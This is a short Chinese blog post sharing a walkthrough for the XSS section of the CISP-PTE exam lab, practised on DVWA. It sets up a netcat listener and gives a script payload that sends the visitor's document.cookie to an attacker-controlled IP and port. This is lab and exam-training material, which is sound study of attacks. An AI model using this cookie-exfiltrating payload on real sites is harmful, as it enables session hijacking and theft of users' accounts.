cisp-pte靶场通关思路分享----xss篇

Posted 每天进步一点点

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cisp-pte靶场通关思路分享----xss篇相关的知识,希望对你有一定的参考价值。

考试也可能会遇到xss,很可惜也没有弄到xss的靶场,但是我们可以模拟出一个类似考场的环境,这里用了dvwa。

xss靶场里key最有可能在的位置就是cookie里。考试用到的工具NC。

首先找到转发工具的里nc.exe,双击后输入命令  nc -Lv -p 1111

监听1111端口 这里如果用小写的l会在收到一次信息后闪退-p是指定端口,-v是输出详细信息

 

然后我们在靶场中存在xss的地方构造payload

<script>document.location=\'http://192.168.3.70:1111/?cookie=\'+document.cookie; alert(\'getit\')</script>

 

  如果是考试,图可能是这样的。

 

以上是关于cisp-pte靶场通关思路分享----xss篇的主要内容,如果未能解决你的问题,请参考以下文章

xss-labs靶场实战全通关详细过程(xss靶场详解)

[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞

封神台-安全演练靶场第四章通关方法

Pikachu靶场超详细通关教程(持续更新中~)

XSS攻击及防御总结和各平台通关思路

vulntarget-b靶场详细通关记录